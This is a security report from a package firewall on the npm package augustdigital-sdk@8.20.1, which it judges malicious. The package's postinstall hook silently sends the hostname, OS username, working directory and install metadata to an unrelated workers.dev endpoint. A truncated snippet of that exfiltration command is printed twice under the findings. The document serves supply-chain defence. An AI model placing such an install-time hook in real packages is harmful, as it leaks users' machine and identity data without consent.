---
canonical: "https://firewall.lpm.dev/npm/augustdigital-sdk/v/8.20.1"
markdown: "https://firewall.lpm.dev/npm/augustdigital-sdk/v/8.20.1.md"
package: "augustdigital-sdk"
report_status: "published"
title: "augustdigital-sdk@8.20.1 npm security report"
verdict: "malicious"
version: "8.20.1"
---

# augustdigital-sdk@8.20.1 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Leaks local username, hostname, working directory, and install metadata.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Install Hook Abuse
- **Selected version:** 8.20.1
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Install-time host-identifying telemetry is exfiltrated to an unrelated endpoint. No user SDK call is required.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Verdict:** Malicious
- **Confidence:** 99.0%
- **Started:** 2026-08-11T10:15:17.583Z
- **Finished:** 2026-08-11T10:15:53.034Z
- **Download time:** 512 ms
- **Static scan time:** 3597 ms
- **AI review time:** 31339 ms
- **Total time:** 35451 ms

## Security analysis

### Published attack-surface review

- **Summary:** Install-time host-identifying telemetry is exfiltrated to an unrelated endpoint. No user SDK call is required.

- **Trigger:** npm lifecycle postinstall during package installation

- **Impact:** Leaks local username, hostname, working directory, and install metadata.

- **Evidence paths:** package.json, lib/core/analytics/sentry-runtime.js

- **Review source:** ai\_review

- **Reviewed:** 2026-08-11T10:15:53.034Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** silent HTTPS GET carrying encoded host and user metadata

- **Attack narrative:** On npm installation, the postinstall inline Node command gathers npm package name/version, OS hostname, current OS username, current working directory, and a timestamp. It encodes these fields into an HTTPS request to build-metrics-collector.cdn-ops-health.workers.dev and suppresses all errors. This occurs without an explicit user action or documented SDK operation.

- **Rationale:** The package has a concrete, concealed install-time data-exfiltration path. The Sentry dynamic require is package-aligned and does not mitigate the lifecycle-hook behavior.

- **Files touched:** package.json

- **Network endpoints:** https://build-metrics-collector.cdn-ops-health.workers.dev/npm-install/

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for:** package.json postinstall executes automatically during npm install., It sends hostname, OS username, current directory, package metadata, and timestamp., Data is sent to build-metrics-collector.cdn-ops-health.workers.dev, unrelated to the package's declared August Digital service URLs., Errors are silently suppressed, concealing collection failures.

- **Evidence against:** lib/core/analytics/sentry-runtime.js uses new Function only to select the installed Sentry runtime., No source evidence of payload download or AI-agent configuration writes.

## Public findings

### 1. High: Install Time Lifecycle Scripts
- **Category:** Manifest
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/augustdigital-sdk@8.20.1/package.json>)

Package defines install-time lifecycle scripts.

Public source snippet (untrusted):

```json
scripts.postinstall = node -e "try{require('https').get('https://build-metrics-collector.cdn-ops-health.workers.dev/npm-install/'+encodeURIComponent(JSON.stringify({p:process.env.npm[redacted]||'?',v...
```

### 2. Critical: Red Install Lifecycle Script
- **Category:** Manifest
- **Confidence:** 95.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/augustdigital-sdk@8.20.1/package.json>)

Install-time lifecycle script matches a deterministic static-gate block pattern.

Public source snippet (untrusted):

```json
scripts.postinstall = node -e "try{require('https').get('https://build-metrics-collector.cdn-ops-health.workers.dev/npm-install/'+encodeURIComponent(JSON.stringify({p:process.env.npm[redacted]||'?',v...
```

### 3. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 4. Low: Eval
- **Category:** Source
- **Confidence:** 45.0%
- **Path:** lib/core/analytics/sentry-runtime.js
- **Public source:** [View source](<https://unpkg.com/augustdigital-sdk@8.20.1/lib/core/analytics/sentry-runtime.js>)

Package source references a known benign dynamic code generation pattern.

Public source snippet (untrusted):

```javascript
L32: // `require('@sentry/node')`, which breaks the browser bundle.
L33: const req = new Function('return typeof require === "function" ? require : null')();
L34: return typeof req === 'function' ? req : null;
```

### 5. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 6. Medium: Environment Vars
- **Category:** Source
- **Confidence:** 75.0%

Package source references environment variables.

### 7. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 8. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 9. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 70.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

## Dependencies and install lifecycle
- **Lifecycle scripts present:** Yes
- **Published lifecycle scripts:** postinstall
- **Dependencies:** 13
- **Optional dependencies:** 0
- **Peer dependencies:** 1
- **Development dependencies:** 5
- **Published dependency-graph edges:** 14

### Published dependency entries
- @coral-xyz/anchor ^0.31.1 (Dependency)
- @sentry/browser ^8.0.0 (Dependency)
- @sentry/node ^8.0.0 (Dependency)
- @solana/spl-token ^0.4.14 (Dependency)
- @solana/wallet-adapter-base ^0.9.27 (Dependency)
- @solana/web3.js ^1.98.4 (Dependency)
- @stellar/stellar-sdk ^14.6.1 (Dependency)
- abitype ^1.2.3 (Dependency)
- buffer ^6.0.3 (Dependency)
- ethereum-block-by-date ^1.5.0 (Dependency)
- ethers ^6.13.1 (Dependency)
- lru-cache ^11.2.2 (Dependency)
- uuid ^11.1.0 (Dependency)
- viem ^2.0.0 (PeerDependency)

## Package metadata
- **Package:** augustdigital-sdk
- **Ecosystem:** npm
- **Version:** 8.20.1
- **License:** MIT
- **Version published:** 2026-08-10T18:56:22.777Z
- **Package first seen:** 2026-08-11T10:15:53.034Z
- **Package last seen:** 2026-08-11T10:15:53.034Z
- **Known versions:** 1
- **Latest version:** 8.20.1
- **Appeal under review:** No
- **Description:** JS SDK powering the August Digital ecosystem.
- **Author:** August Digital
- **Keywords:** augustdigital, sdk, js, institutional, defi
- **Artifact files:** 316
- **Artifact unpacked size:** 3,799,710 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/augustdigital-sdk/v/8.20.1>)
- [OSV advisory](<https://osv.dev/vulnerability/MAL-2026-13774>)
- [PACKAGE](<https://www.npmjs.com/package/augustdigital-sdk/v/8.20.1>)
